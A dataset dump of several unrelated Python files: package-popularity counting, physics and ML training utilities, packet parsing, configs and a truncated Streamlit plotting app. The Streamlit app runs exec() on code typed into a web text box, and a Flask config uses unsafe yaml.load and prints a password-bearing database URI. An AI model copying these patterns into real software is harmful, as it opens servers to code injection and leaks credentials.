content
stringlengths 5
1.05M
|
---|
#!/usr/bin/env python3
# 1st-party
import collections
import csv
import json
import logging
import os
import sys
# 2nd-party
import package_cache
import translation_cache
# Data source 3: A map of a project to the date (not time) of when it last
# added, updated or removed a package.
PACKAGE_LAST_MODIFIED_FILENAME = '/var/experiments-output/package_cache.json'
# The time since the hypothetical compromise began (i.e. since the download log
# began).
SINCE_TIMESTAMP = 1395360000
# this script will traverse the filename in the format of sorted.simple.log
# and count the instances of every package request that occurred.
def sort_packages_by_popularity(filename):
packages = collections.Counter()
# Zero counters for all projects estimated to exist before compromise.
with open(PACKAGE_LAST_MODIFIED_FILENAME, 'rt') as fp:
packages_list = json.load(fp)
for package in packages_list:
# Get timestamps of when the project added/updated/removed a package.
timestamps = packages_list[package]
timestamp = \
package_cache.get_last_timestamp_before_compromise(timestamps,
SINCE_TIMESTAMP)
# This project was updated sometime before compromise.
# That means this project can be included in the set of projects that
# existed before compromise, giving us a better estimate of the true
# number of projects that existed just before compromise.
if timestamp:
assert timestamp < SINCE_TIMESTAMP
packages[package] = 0
logging.info('# of projects estimated to exist before compromise: {:,}'\
.format(len(packages)))
# Now count the popularity of packages that were actually downloaded.
# NOTE: This is extremely biased towards the compromise period, but we have
# no better data. Must note in paper.
with open(filename, 'rt') as simple_log:
requests = csv.reader(simple_log)
for timestamp, anonymized_ip, request, user_agent in requests:
package_name = translation_cache.infer_package_name(request)
assert package_name
assert len(package_name) > 0, request
packages[package_name] += 1
# order the dictionary
logging.info('total # projects seen to exist after compromise: {:,}'\
.format(len(packages)))
with open('/var/experiments-output/packages_by_popularity.txt', 'wt') as \
ordered_packages_file:
for package, count in packages.most_common():
assert len(package) > 0
ordered_packages_file.write("{},{}\n".format(package, count))
if __name__ == '__main__':
# rw for owner and group but not others
os.umask(0o07)
assert len(sys.argv) == 2
log_filename = sys.argv[1]
sort_packages_by_popularity(log_filename)
|
"""Project: Eskapade - A Python-based package for data analysis.
Module: root_analysis.decorators.roofit
Created: 2017/04/24
Description:
Decorators for PyROOT RooFit objects
Authors:
KPMG Advanced Analytics & Big Data team, Amstelveen, The Netherlands
Redistribution and use in source and binary forms, with or without
modification, are permitted according to the terms listed in the file
LICENSE.
"""
import ROOT
def coll_iter(coll):
"""Iterate over items in RooAbsCollection."""
it = coll.fwdIterator()
obj = it.next()
while obj:
yield obj
obj = it.next()
def ws_contains(ws, key):
"""Check if RooWorkspace contains an object."""
if isinstance(key, str):
return bool(ws.obj(key))
try:
obj = ws.obj(key if isinstance(key, str) else key.GetName())
return obj == key
except Exception:
return False
def ws_put(ws, *args):
"""Put object in RooWorkspace."""
ws_import = getattr(ROOT.RooWorkspace, 'import')
if len(args) == 1 and any(isinstance(args[0], c) for c in (ROOT.RooAbsArg, ROOT.RooArgSet, ROOT.RooAbsData)):
args += (ROOT.RooCmdArg(),)
return ws_import(ws, *args)
def data_set_iter(self):
"""Iterate over events in RooDataSet."""
for it in range(self.numEntries()):
yield self.get(it)
def ws_setitem(ws, key, value):
"""Put object in RooWorkspace dict-style."""
if not isinstance(value, ROOT.TObject):
raise AssertionError('Cannot import object with type "{}" into workspace.'.format(type(value)))
getattr(ws, 'import')(value, key)
# set decorators
ROOT.RooAbsReal.__float__ = lambda self: self.getVal()
ROOT.RooAbsCollection.__iter__ = coll_iter
ROOT.RooAbsCollection.__getitem__ = lambda c, i: c.find(i)
ROOT.RooAbsCollection.__contains__ = lambda c, i: True if c.find(i) else False
ROOT.RooArgSet.__getitem__ = ROOT.RooAbsCollection.__getitem__
ROOT.RooArgList.__getitem__ = lambda l, i: l.at(i) if isinstance(i, int) else ROOT.RooAbsCollection.__getitem__(l, i)
ROOT.RooWorkspace.__contains__ = ws_contains
ROOT.RooWorkspace.__getitem__ = lambda ws, k: ws.obj(k)
ROOT.RooWorkspace.__setitem__ = ws_setitem
ROOT.RooWorkspace.put = ws_put
ROOT.RooDataSet.__iter__ = data_set_iter
# flag functions that create objects that should be deleted
for func in [ROOT.RooAbsPdf.generate, ROOT.RooAbsPdf.fitTo, ROOT.RooAbsData.reduce]:
func._creates = True
|
"""PacketMeta, Use DPKT to pull out packet information and convert those
attributes to a dictionary based output."""
import datetime
import dpkt
# Local imports
from chains.links import link
from chains.utils import file_utils, data_utils
class PacketMeta(link.Link):
"""PacketMeta, Use DPKT to pull out packet information and convert those
attributes to a dictionary based output."""
def __init__(self):
"""Initialize PacketMeta Class"""
# Call super class init
super(PacketMeta, self).__init__()
# Set my output
self.output_stream = self.packet_meta_data()
def packet_meta_data(self):
"""Pull out the metadata about each packet from the input_stream
Args:
None
Returns:
generator (dictionary): a generator that contains packet meta data in the form of a dictionary"""
# For each packet in the pcap process the contents
for item in self.input_stream:
# Output object
output = {}
# Grab the fields I need
timestamp = item['timestamp']
buf = item['raw_buf']
# Print out the timestamp in UTC
output['timestamp'] = datetime.datetime.utcfromtimestamp(timestamp)
# Unpack the Ethernet frame (mac src/dst, ethertype)
eth = dpkt.ethernet.Ethernet(buf)
output['eth'] = {'src': eth.src, 'dst': eth.dst, 'type':eth.type, 'len': len(eth)}
# Grab packet data
packet = eth.data
# Packet Type ('EtherType') (IP, ARP, PPPoE, IP6... see http://en.wikipedia.org/wiki/EtherType)
if hasattr(packet, 'data'):
output['packet'] = {'type': packet.__class__.__name__, 'data': packet.data}
else:
output['packet'] = {'type': None, 'data': None}
# It this an IP packet?
if output['packet']['type'] == 'IP':
# Pull out fragment information (flags and offset all packed into off field, so use bitmasks)
df = bool(packet.off & dpkt.ip.IP_DF)
mf = bool(packet.off & dpkt.ip.IP_MF)
offset = packet.off & dpkt.ip.IP_OFFMASK
# Pulling out src, dst, length, fragment info, TTL, checksum and Protocol
output['packet'].update({'src':packet.src, 'dst':packet.dst, 'p': packet.p, 'len':packet.len, 'ttl':packet.ttl,
'df':df, 'mf': mf, 'offset': offset, 'checksum': packet.sum})
# Is this an IPv6 packet?
elif output['packet']['type'] == 'IP6':
# Pulling out the IP6 fields
output['packet'].update({'src':packet.src, 'dst':packet.dst, 'p': packet.p, 'len':packet.plen, 'ttl':packet.hlim})
# If the packet isn't IP or IPV6 just pack it as a dictionary
else:
output['packet'].update(data_utils.make_dict(packet))
# For the transport layer we're going to set the transport to None. and
# hopefully a 'link' upstream will manage the transport functionality
output['transport'] = None
# For the application layer we're going to set the application to None. and
# hopefully a 'link' upstream will manage the application functionality
output['application'] = None
# All done
yield output
def test():
"""Test for PacketMeta class"""
from chains.sources import packet_streamer
import pprint
# Create a PacketStreamer and set its output to PacketMeta input
data_path = file_utils.relative_dir(__file__, '../../data/http.pcap')
streamer = packet_streamer.PacketStreamer(iface_name=data_path, max_packets=50)
meta = PacketMeta()
meta.link(streamer)
for item in meta.output_stream:
pprint.pprint(item)
if __name__ == '__main__':
test()
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Train.
Example command:
python -m aux_tasks.grid.train \
--base_dir=/tmp/pw \
--reverb_address=localhost:1234 \
--config=aux_tasks/grid/config.py:implicit
"""
import functools
import pathlib
import signal
from typing import Callable, NamedTuple, Optional, Sequence
from absl import app
from absl import flags
from absl import logging
import chex
from clu import checkpoint
from clu import metric_writers
from clu import metrics as clu_metrics
from clu import periodic_actions
from flax import struct
import flax.linen as nn
from flax.training.train_state import TrainState
import jax
import jax.numpy as jnp
from ml_collections import config_dict
from ml_collections import config_flags
import optax
import tqdm
from aux_tasks.grid import dataset
from aux_tasks.grid import loss_utils
from aux_tasks.grid import utils
_BASE_DIR = flags.DEFINE_string('base_dir', None, 'Base directory')
_CONFIG = config_flags.DEFINE_config_file('config', lock_config=True)
@struct.dataclass
class TrainMetrics(clu_metrics.Collection):
loss: clu_metrics.Average.from_output('loss')
rank: clu_metrics.Average.from_output('rank')
# @struct.dataclass
# class EvalMetrics(clu_metrics.Collection):
# grassman_distance: clu_metrics.LastValue.from_output('grassman_distance')
# dot_product: clu_metrics.LastValue.from_output('dot_product')
# top_singular_value: clu_metrics.LastValue.from_output('top_singular_value')
@struct.dataclass
class EvalMetrics(clu_metrics.Collection):
eval_loss: clu_metrics.Average.from_output('loss')
class SpectralDense(nn.Module):
"""Spectral Dense."""
features: int
kernel_init: Callable[[chex.PRNGKey, tuple[int, Ellipsis], jnp.dtype], chex.Array]
@nn.compact
def __call__(self, inputs):
kernel = self.param('kernel', self.kernel_init,
(inputs.shape[-1], self.features))
# TODO(jfarebro): use power iteration
_, s, _ = jnp.linalg.svd(kernel, full_matrices=False)
kernel /= s[0]
return jnp.einsum('...x,xf->...f', inputs, kernel)
class MLPEncoder(nn.Module):
"""MLP Encoder."""
num_layers: int
num_units: int
embedding_dim: int
@nn.compact
def __call__(self, inputs):
kernel_init = nn.initializers.xavier_uniform()
x = inputs
for _ in range(self.num_layers - 1):
x = nn.Dense(self.num_units, kernel_init=kernel_init)(x)
x = nn.PReLU()(x)
x = nn.Dense(self.embedding_dim, kernel_init=kernel_init)(x)
x = nn.PReLU()(x)
return x
class ModuleOutputs(NamedTuple):
phi: chex.Array
predictions: Optional[chex.Array]
class ImplicitModule(nn.Module):
encoder: nn.Module
@nn.compact
def __call__(self, inputs):
return ModuleOutputs(self.encoder(inputs), None)
class ExplicitModule(nn.Module):
"""Explicit Module."""
encoder: nn.Module
num_tasks: int
@nn.compact
def __call__(self, inputs):
kernel_init = nn.initializers.xavier_uniform()
phi = self.encoder(inputs)
x = nn.Dense(self.num_tasks, kernel_init=kernel_init)(phi)
return ModuleOutputs(phi, x)
class LinearModule(nn.Module):
"""Linear Module."""
num_tasks: int
@nn.compact
def __call__(self, phi):
kernel_init = nn.initializers.xavier_uniform()
x = nn.Dense(self.num_tasks, kernel_init=kernel_init)(phi)
return x
@functools.partial(
jax.jit, donate_argnums=(0, 1), static_argnames=('stop_grad', 'l2_coeff'))
def train_step_naive(state,
metrics,
inputs,
targets,
*,
stop_grad = True,
rcond = 1e-5):
"""Train naive CG."""
def loss_fn(params):
outputs = state.apply_fn(params, inputs)
phis = outputs.phi
# ws = jax.scipy.sparse.linalg.cg(
# phis.T @ phis, phis.T @ targets, tol=1e-12)[0]
ws, _, _, _ = jnp.linalg.lstsq(phis, targets, rcond=rcond)
if stop_grad:
ws = jax.lax.stop_gradient(ws)
task_outputs = phis @ ws
loss = jnp.mean(optax.l2_loss(task_outputs, targets))
rank = jnp.linalg.matrix_rank(phis.T @ phis)
metrics_update = metrics.single_from_model_output(loss=loss, rank=rank)
return loss, metrics_update
grad_fn = jax.grad(loss_fn, argnums=0, has_aux=True)
grads, metrics_update = grad_fn(state.params)
state = state.apply_gradients(grads=grads)
metrics = metrics.merge(metrics_update)
return state, metrics
@functools.partial(
jax.jit, static_argnames=('batch_sizes', 'alpha'), donate_argnums=(0, 1))
def train_step_implicit(state, metrics,
inputs, targets, *,
batch_sizes,
alpha):
"""Train step implicit."""
def loss_fn(params):
outputs = state.apply_fn(params, inputs)
phis = outputs.phi
rank = jnp.linalg.matrix_rank(phis.T @ phis)
# Split out phis for implicit least squares grad computation
phis = loss_utils.split_in_chunks(phis, [
batch_sizes.main,
batch_sizes.weight,
batch_sizes.weight,
batch_sizes.cov,
batch_sizes.cov,
]) # pyformat: disable
# Split out psis for implicit least squares grad computation
psis = loss_utils.split_in_chunks(targets, [
batch_sizes.main,
batch_sizes.weight,
batch_sizes.weight
]) # pyformat: disable
loss = loss_utils.implicit_least_squares(*phis, *psis, alpha=alpha)
metrics_update = metrics.single_from_model_output(loss=loss, rank=rank)
return loss, metrics_update
grad_fn = jax.grad(loss_fn, argnums=0, has_aux=True)
grads, metrics_update = grad_fn(state.params)
state = state.apply_gradients(grads=grads)
metrics = metrics.merge(metrics_update)
return state, metrics
@functools.partial(
jax.jit, static_argnames=('batch_sizes', 'alpha'), donate_argnums=(0, 1))
def train_step_naive_implicit(state, metrics,
inputs, targets, *,
alpha):
"""Train naive implicit."""
def loss_fn(params):
outputs = state.apply_fn(params, inputs)
phis = outputs.phi
# Split out phis for implicit least squares grad computation
loss = loss_utils.naive_implicit_least_squares(phis, targets, alpha=alpha)
rank = jnp.linalg.matrix_rank(phis.T @ phis)
metrics_update = metrics.single_from_model_output(loss=loss, rank=rank)
return loss, metrics_update
grad_fn = jax.grad(loss_fn, argnums=0, has_aux=True)
grads, metrics_update = grad_fn(state.params)
state = state.apply_gradients(grads=grads)
metrics = metrics.merge(metrics_update)
return state, metrics
@functools.partial(
jax.jit, static_argnames=('batch_sizes', 'alpha'), donate_argnums=(0, 1))
def train_step_explicit(state,
metrics,
inputs,
targets):
"""Train naive implicit."""
def loss_fn(params):
outputs = state.apply_fn(params, inputs)
predictions = outputs.predictions
phis = outputs.phi
# Split out phis for implicit least squares grad computation
loss = jnp.mean(optax.l2_loss(predictions, targets))
rank = jnp.linalg.matrix_rank(phis.T @ phis)
metrics_update = metrics.single_from_model_output(loss=loss, rank=rank)
return loss, metrics_update
grad_fn = jax.grad(loss_fn, argnums=0, has_aux=True)
grads, metrics_update = grad_fn(state.params)
state = state.apply_gradients(grads=grads)
metrics = metrics.merge(metrics_update)
return state, metrics
# @functools.partial(jax.jit, static_argnames=('config'))
# def evaluate_mdp(state: TrainState, aux_task_matrix: chex.Array,
# config: config_dict.ConfigDict) -> clu_metrics.Collection:
# """Evaluate."""
# u = loss_utils.top_d_singular_vectors(aux_task_matrix, config.embedding_dim)
# num_states = u.shape[0]
# states = jax.nn.one_hot(jnp.arange(num_states), num_states)
# phis = state.apply_fn(state.params, states)
# top_singular_value = jnp.linalg.norm(phis.T @ phis, ord=2)
# grassman_distance = loss_utils.grassman_distance(phis, u)
# if phis.shape[-1] == 1:
# dot_product = phis.T @ u / (jnp.linalg.norm(phis) * jnp.linalg.norm(u))
# dot_product = dot_product.flatten()
# else:
# dot_product = None
# return EvalMetrics.single_from_model_output(
# grassman_distance=grassman_distance,
# dot_product=dot_product,
# top_singular_value=top_singular_value)
def create_default_writer():
return metric_writers.create_default_writer() # pylint: disable=unreachable
@functools.partial(jax.jit, donate_argnums=(1, 2))
def evaluate_step(
train_state,
eval_state,
metrics,
inputs,
targets):
"""Eval train step."""
outputs = train_state.apply_fn(train_state.params, inputs)
phis = outputs.phi
def loss_fn(params):
predictions = jax.vmap(eval_state.apply_fn, in_axes=(None, 0))(params, phis)
loss = jnp.mean(optax.l2_loss(predictions, targets))
metrics_update = EvalMetrics.single_from_model_output(loss=loss)
return loss, metrics_update
grad_fn = jax.grad(loss_fn, argnums=0, has_aux=True)
grads, metrics_update = grad_fn(eval_state.params)
eval_state = eval_state.apply_gradients(grads=grads)
metrics = metrics.merge(metrics_update)
return eval_state, metrics
def evaluate(base_dir, config, *,
train_state):
"""Eval function."""
chkpt_manager = checkpoint.Checkpoint(str(base_dir / 'eval'))
writer = create_default_writer()
key = jax.random.PRNGKey(config.eval.seed)
model_init_key, ds_key = jax.random.split(key)
linear_module = LinearModule(config.eval.num_tasks)
params = linear_module.init(model_init_key,
jnp.zeros((config.encoder.embedding_dim,)))
lr = optax.cosine_decay_schedule(config.eval.learning_rate,
config.num_eval_steps)
optim = optax.adam(lr)
ds = dataset.get_dataset(config, ds_key, num_tasks=config.eval.num_tasks)
ds_iter = iter(ds)
state = TrainState.create(
apply_fn=linear_module.apply, params=params, tx=optim)
state = chkpt_manager.restore_or_initialize(state)
report_progress = periodic_actions.ReportProgress(
num_train_steps=config.num_eval_steps, writer=writer)
hooks = [
report_progress,
periodic_actions.Profile(num_profile_steps=5, logdir=str(base_dir))
]
def handle_preemption(signal_number, _):
logging.info('Received signal %d, saving checkpoint.', signal_number)
with report_progress.timed('checkpointing'):
chkpt_manager.save(state)
logging.info('Finished saving checkpoint.')
signal.signal(signal.SIGTERM, handle_preemption)
metrics = EvalMetrics.empty()
with metric_writers.ensure_flushes(writer):
for step in tqdm.tqdm(range(state.step, config.num_eval_steps)):
with jax.profiler.StepTraceAnnotation('eval', step_num=step):
states, targets = next(ds_iter)
state, metrics = evaluate_step(
train_state, state, metrics, states, targets)
if step % config.log_metrics_every == 0:
writer.write_scalars(step, metrics.compute())
metrics = EvalMetrics.empty()
for hook in hooks:
hook(step)
# Finally, evaluate on the true(ish) test aux task matrix.
states, targets = dataset.EvalDataset(config, ds_key).get_batch()
@jax.jit
def loss_fn():
outputs = train_state.apply_fn(train_state.params, states)
phis = outputs.phi
predictions = jax.vmap(
state.apply_fn, in_axes=(None, 0))(state.params, phis)
return jnp.mean(optax.l2_loss(predictions, targets))
test_loss = loss_fn()
writer.write_scalars(config.num_eval_steps + 1, {'test_loss': test_loss})
def train(base_dir, config):
"""Train function."""
print(config)
chkpt_manager = checkpoint.Checkpoint(str(base_dir / 'train'))
writer = create_default_writer()
# Initialize dataset
key = jax.random.PRNGKey(config.seed)
key, subkey = jax.random.split(key)
ds = dataset.get_dataset(config, subkey, num_tasks=config.num_tasks)
ds_iter = iter(ds)
key, subkey = jax.random.split(key)
encoder = MLPEncoder(**config.encoder)
train_config = config.train.to_dict()
train_method = train_config.pop('method')
module_config = train_config.pop('module')
module_class = module_config.pop('name')
module = globals().get(module_class)(encoder, **module_config)
train_step = globals().get(f'train_step_{train_method}')
train_step = functools.partial(train_step, **train_config)
params = module.init(subkey, next(ds_iter)[0])
lr = optax.cosine_decay_schedule(config.learning_rate, config.num_train_steps)
optim = optax.chain(optax.adam(lr),
# optax.adaptive_grad_clip(0.15)
)
state = TrainState.create(apply_fn=module.apply, params=params, tx=optim)
state = chkpt_manager.restore_or_initialize(state)
# Hooks
report_progress = periodic_actions.ReportProgress(
num_train_steps=config.num_train_steps, writer=writer)
hooks = [
report_progress,
periodic_actions.Profile(num_profile_steps=5, logdir=str(base_dir))
]
def handle_preemption(signal_number, _):
logging.info('Received signal %d, saving checkpoint.', signal_number)
with report_progress.timed('checkpointing'):
chkpt_manager.save(state)
logging.info('Finished saving checkpoint.')
signal.signal(signal.SIGTERM, handle_preemption)
metrics = TrainMetrics.empty()
with metric_writers.ensure_flushes(writer):
for step in tqdm.tqdm(range(state.step, config.num_train_steps)):
with jax.profiler.StepTraceAnnotation('train', step_num=step):
states, targets = next(ds_iter)
state, metrics = train_step(state, metrics, states, targets)
logging.log_first_n(logging.INFO, 'Finished training step %d', 5, step)
if step % config.log_metrics_every == 0:
writer.write_scalars(step, metrics.compute())
metrics = TrainMetrics.empty()
# if step % config.log_eval_metrics_every == 0 and isinstance(
# ds, dataset.MDPDataset):
# eval_metrics = evaluate_mdp(state, ds.aux_task_matrix, config)
# writer.write_scalars(step, eval_metrics.compute())
for hook in hooks:
hook(step)
chkpt_manager.save(state)
return state
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
base_dir = pathlib.Path(_BASE_DIR.value)
config = _CONFIG.value
train_state = train(base_dir, config)
evaluate(base_dir, config, train_state=train_state)
if __name__ == '__main__':
app.run(main)
|
"""
Oscilators
"""
import numpy as np
from blipwave import RATE
def vco(waveform, frequencies, rate=48000):
"""
Simulates a voltage controlled oscillator
Args:
frequencies: a numpy of instantaneous frequencies (in Hz) at each sample
waveform: shape of the oscillation, any periodic function
Returns:
numpy array of waveform with varying frequency.
"""
return waveform(2*np.pi * np.cumsum(frequencies/rate))
def lfo(freq, waveform, length, rate=48000):
"""
Simulates a low frequency oscilator
Args:
freq: frequency of the oscillation
waveform: form of the oscillation, a periodic function
length: number of samples to output
Returns:
numpy array of waveform with constant frequency
"""
return waveform(2 * np.pi * np.linspace(0, freq*length/rate, length))
|
#
# Copyright (c) 2016-2022 Deephaven Data Labs and Patent Pending
#
import unittest
from deephaven import empty_table
from deephaven.perfmon import process_info_log, process_metrics_log, server_state_log, \
query_operation_performance_log, query_performance_log, update_performance_log, metrics_get_counters, \
metrics_reset_counters
from tests.testbase import BaseTestCase
def create_some_counters():
t = empty_table(10).update(formulas=["X=i"])
t2 = empty_table(10).update(formulas=["X=i"])
return t.join(t2, on=["X"])
class PerfmonTestCase(BaseTestCase):
def test_metrics_get_counters(self):
metrics_reset_counters()
t = create_some_counters()
# counters should accumulate some values after performing some operations
counters_str = metrics_get_counters()
t = create_some_counters()
# counters now should have different values after performing the same operation one more time
counters_str2 = metrics_get_counters()
self.assertNotEqual(counters_str, counters_str2)
# After reset and performing the same operation again, the counters' values should reset.
# We can't ensure they are exactly the same as before, because the engine state may be
# captured in some non-exactly-zero-counters due to other pre-existing table updates.
metrics_reset_counters()
t = create_some_counters()
counters_str3 = metrics_get_counters()
self.assertNotEqual(counters_str2, counters_str3)
def test_process_logs(self):
log_table = process_info_log()
self.assertTrue(log_table.to_string())
log_table = server_state_log()
self.assertTrue(log_table.to_string())
log_table = process_metrics_log()
self.assertTrue(log_table.to_string())
def test_query_logs(self):
log_table = query_operation_performance_log()
self.assertTrue(log_table.to_string())
log_table = query_performance_log()
self.assertTrue(log_table.to_string())
log_table = update_performance_log()
self.assertTrue(log_table.to_string())
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
__author__ = 'vincent'
import os
import yaml
import json
from app.utils import toolkit
Cfg = {}
BodySchema = {}
# 获取当前目录
basedir = os.path.abspath(os.path.dirname(__file__))
# 加载 参数校验相关信息
with open(basedir + "/body-schema.yaml") as f:
BodySchema = yaml.load(f)
with open(basedir + "/base-config.yaml") as f:
Cfg = yaml.load(f)
SERVICE_CONFIG_PATH = os.environ.get('SERVICE_TEMPLATE_CONFIG_PATH')
with open(SERVICE_CONFIG_PATH) as f:
_d = yaml.load(f)
if _d:
toolkit.obj_update(_d, Cfg)
class Config:
# 设置Logger的日志名称
LOGGER_NAME = 'V'
SECRET_KEY = Cfg.get('webServer', {}).get('secret')
# 加盐加密字符串格式
ENCRYPT_STR_FORMAT = Cfg.get('webServer', {}).get('str_format')
# Token 的加密密匙
TOKEN_SECRET_KEY= Cfg.get('webServer', {}).get('token_secret')
# AK 加解密
AES_KEY = Cfg.get('AES', {}).get('key')
AES_IV = Cfg.get('AES', {}).get('iv')
# 数据库连接池的大小。默认是数据库引擎的默认值 (通常是 5)
SQLALCHEMY_POOL_SIZE = 5
# 控制在连接池达到最大值后可以创建的连接数。当这些额外的 连接回收到连接池后将会被断开和抛弃。
SQLALCHEMY_MAX_OVERFLOW = 10
# 开启自动提交
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
# 避免内存开销太大,所以禁止此项,设置True;
# 如果要开启慢查询,则此项需要设置 SQLALCHEMY_TRACK_MODIFICATIONS=False 并设置 SQLALCHEMY_RECORD_QUERIES=True
SQLALCHEMY_TRACK_MODIFICATIONS = False
# 开启慢查询
SQLALCHEMY_RECORD_QUERIES = True
# 分页中,每页默认现实的条目数量
PER_PAGE = 20
# SQL慢查询的阀值
FLASKY_SLOW_DB_QUERY_TIME = 0.5
# mysql 链接设置
SQLALCHEMY_DATABASE_URI ="mysql://{}:{}@{}:{}/{}?charset=utf8".format(
Cfg['mysql']['user'],
Cfg['mysql']['password'],
Cfg['mysql']['host'],
Cfg['mysql']['port'],
# Cfg['mysql']['database']
'ast_test'
)
print SQLALCHEMY_DATABASE_URI
# Redis 链接设置
# REDIS_URL = "redis://localhost:6379/3"
@staticmethod
def init_app(app):
pass
class TestConfig:
# 设置Logger的日志名称
LOGGER_NAME = 'VTest'
SECRET_KEY = Cfg.get('webServer', {}).get('secret')
# 加盐加密字符串格式
ENCRYPT_STR_FORMAT = Cfg.get('webServer', {}).get('str_format')
# Token 的加密密匙
TOKEN_SECRET_KEY= Cfg.get('webServer', {}).get('token_secret')
# AK 加解密
AES_KEY = Cfg.get('AES', {}).get('key')
AES_IV = Cfg.get('AES', {}).get('iv')
# 数据库连接池的大小。默认是数据库引擎的默认值 (通常是 5)
# SQLALCHEMY_POOL_SIZE = 5
# 控制在连接池达到最大值后可以创建的连接数。当这些额外的 连接回收到连接池后将会被断开和抛弃。
# SQLALCHEMY_MAX_OVERFLOW = 10
# 开启自动提交
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
# 避免内存开销太大,所以禁止此项,设置True;
# 如果要开启慢查询,则此项需要设置 SQLALCHEMY_TRACK_MODIFICATIONS=False 并设置 SQLALCHEMY_RECORD_QUERIES=True
SQLALCHEMY_TRACK_MODIFICATIONS = True
# 开启慢查询
# SQLALCHEMY_RECORD_QUERIES = True
# 分页中,每页默认现实的条目数量
PER_PAGE = 20
# SQL慢查询的阀值
# FLASKY_SLOW_DB_QUERY_TIME = 0.5
# mysql 链接设置
SQLALCHEMY_DATABASE_URI ="mysql://{}:{}@{}:{}/{}?charset=utf8".format(
Cfg['mysql']['user'],
Cfg['mysql']['password'],
Cfg['mysql']['host'],
Cfg['mysql']['port'],
'ast_test'
)
# 使用 sqlite 数据库
# SQLALCHEMY_DATABASE_URI = "sqlite:///{}".format( os.path.join(os.path.dirname(basedir), 'data-sqlite.db') )
print SQLALCHEMY_DATABASE_URI
# Redis 链接设置
# REDIS_URL = "redis://localhost:6379/3"
@staticmethod
def init_app(app):
pass
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-09 08:47
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('smartshark', '0012_auto_20160608_1459'),
]
operations = [
migrations.AddField(
model_name='project',
name='clone_username',
field=models.CharField(blank=True, max_length=200),
),
]
|
# -*- coding: utf-8 -*-
""" Manage Historical Data """
import yfdao
import sql
def add_symbol(symbol):
info = yfdao.info(symbol.upper())
name = info['longName']
ex = info['fullExchangeName']
region = info['region']
ex_tz = info['exchangeTimezoneShortName']
sql.dao.add_symbol(symbol, name, ex, ex_tz)
def enable_symbol(symbol, en=True):
sql.dao.enable_symbol(symbol.upper(), en)
def load_symbols(syms):
for s in syms:
load_symbol(s.upper())
def load_symbol(sym):
sql.dao.clear_history(sym)
period = "max"
(hist, splits, divs) = yfdao.load(sym)
sql.dao.add_history_bulk( hist )
sql.dao.add_splits( splits )
sql.dao.add_dividends( divs )
def update_symbols():
None
def reset_symbol(symbol):
sql.dao.clear_history(symbol.upper())
sql.dao.enable_symbol(symbol.upper(), enable=False)
def list_symbols(inactive=False):
return sql.dao.list_symbols(inactive)
|
# Built-In Modules
import os, sys
from pathlib import Path as pt
# DATA Analysis
import numpy as np
from scipy.optimize import curve_fit
from uncertainties import ufloat as uf
from uncertainties import unumpy as unp
from plotly.subplots import make_subplots
import plotly.graph_objects as go
try: import streamlit as st
except:
filename = pt(__file__)
pipFolder = filename.parent.parent / "pipPackages"
if pipFolder.exists():
packageName = "streamlit-0.51.0-py2.py3-none-any.whl"
package = os.path.join(pipFolder, packageName)
import subprocess
subprocess.check_call([sys.executable, '-m', 'pip', 'install', package])
import streamlit as st
from timescan import timescanplot
from FELion_constants import colors
from io import StringIO
import contextlib
@contextlib.contextmanager
def stdoutIO(stdout=None):
old = sys.stdout
if stdout is None:
stdout = StringIO()
sys.stdout = stdout
yield stdout
sys.stdout = old
class depletionplot:
def __init__(self, location):
location = st.text_input("Current Location", location)
self.location = pt(location)
self.initialise()
self.fig = make_subplots(rows=1, cols=2)
try:
self.get_timescan_data()
Koff, N = self.resOff_fit()
Na0, Nn0, Kon = self.resOn_fit(Koff, N)
self.make_slider(Koff, Kon, N, Na0, Nn0)
Koff = self.koff_slider
Kon = self.kon_slider
N = self.n_slider
Na0 = self.na_slider
Nn0 = self.nn_slider
self.runFit(Koff, Kon, N, Na0, Nn0)
layout = go.Layout(
xaxis={"title":self.xaxis_title},
yaxis={"title":"Counts"},
xaxis2={"title":self.xaxis_title},
yaxis2={"title":"Relative depletion of active isomer"}
)
self.fig.update_layout(layout)
st.plotly_chart(self.fig, height=700)
pycode = st.text_area("pyCode")
with stdoutIO() as result:
exec(pycode)
st.write(result.getvalue())
except Exception as error:
st.title("Choose proper ResOn and ResOff file from the sidebar")
st.subheader("Error details")
st.write(error)
def initialise(self):
self.method = st.sidebar.selectbox("Method", ("Power dependence", "Time dependece"))
pwidget = st.sidebar.empty()
scanfiles = list(self.location.glob("*.scan"))
scanfiles = [i.name for i in scanfiles]
if st.sidebar.button("Refresh"):
scanfiles = list(self.location.glob("*.scan"))
scanfiles = [i.name for i in scanfiles]
self.resON_select = st.sidebar.selectbox("Res ON:", scanfiles)
self.resOFF_select = st.sidebar.selectbox("Res OFF:", scanfiles)
self.resOnFile = self.location/self.resON_select
self.resOffFile = self.location/self.resOFF_select
self.nshots = st.sidebar.radio("FELIX (Hz)", (10, 5))
self.massIndex = st.sidebar.number_input("MassIndex", 0, value=1)
self.timeStart = st.sidebar.number_input("TimeStartIndex", 0, value=1)
if self.method == "Power dependence":
powerWidget = pwidget.text_input("Power (ON, OFF)", "12, 12")
power_values = np.asarray(powerWidget.split(","), dtype=np.float)
self.powerOn = power_values[0]
self.powerOff = power_values[1]
self.power = {"resOn": power_values[0]/1000, "resOff": power_values[1]/1000} # mJ to J
self.xaxis_title = "n*t*E (J)"
else:
self.powerOn = "-"
self.powerOff = "-"
self.power = {"resOn": 1, "resOff": 1}
self.nshots = 1
self.xaxis_title = "Time (s)"
def make_slider(self, Koff, Kon, N, Na0, Nn0):
self.koff_slider = st.sidebar.slider("Koff", 0.0, np.float(Koff*10), np.float(Koff))
self.kon_slider = st.sidebar.slider("Kon", 0.0, np.float(Kon*10), np.float(Kon))
self.n_slider = st.sidebar.slider("N", 0.0, np.float(N*10), np.float(N))
self.na_slider = st.sidebar.slider("Na0", 0.0, np.float(Na0*10), np.float(Na0))
